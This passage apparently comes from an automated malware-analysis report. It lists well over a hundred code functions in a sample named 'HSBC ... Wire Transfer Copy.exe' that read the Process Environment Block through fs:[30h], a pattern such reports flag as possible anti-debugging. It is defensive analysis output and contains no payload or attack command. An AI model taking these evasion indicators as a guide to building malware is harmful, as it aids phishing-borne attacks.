          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01664A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01638A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01625210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01625210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01625210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01625210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01643A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01663D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016D3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01647D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016AA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01654D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01654D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01654D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016D8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01651DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01651DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01651DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01624F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01624F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01638794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016DFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01658E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01668EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016536CC mov eax, dword ptr fs:[00000030h]
